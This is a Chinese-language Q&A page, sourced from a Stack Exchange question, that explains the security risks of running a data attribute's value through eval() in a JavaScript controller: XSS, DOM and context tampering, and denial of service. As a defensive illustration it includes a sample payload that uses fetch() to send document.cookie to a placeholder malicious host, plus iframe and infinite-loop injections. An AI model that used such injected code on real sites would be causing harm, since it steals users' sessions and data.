You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

JavaScript中eval()执行data属性值的风险及恶意行为分析

该场景下的恶意攻击风险
  • XSS注入引发任意代码执行:如果攻击者能够篡改页面的data-css-prop-mutator-changer-param属性值(比如通过未过滤的用户输入渲染到页面、前端DOM篡改漏洞等途径),将其替换为恶意代码字符串,例如fetch('https://恶意地址/steal?cookie=' + document.cookie),或者document.body.innerHTML = '<iframe src="钓鱼页面"></iframe>',eval执行后会直接在用户浏览器中运行这些代码,进而窃取用户敏感数据、伪造用户操作、劫持页面控制权。

  • 上下文信息窃取与篡改:你的eval代码运行在Controller类update方法的上下文环境中,攻击者可以通过恶意代码访问this.element、e.detail等上下文对象,比如修改页面关键DOM结构、篡改事件参数,甚至通过全局window对象修改页面其他功能逻辑,破坏原有业务流程。

  • 拒绝服务攻击:攻击者可以注入无限循环(如while(true){})、大量占用内存的代码,导致页面卡顿、浏览器崩溃;或者删除页面核心DOM元素、篡改全局样式,让页面完全无法正常使用,造成服务不可用。

内容的提问来源于stack exchange,提问作者gremo

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.08.24 04:06:26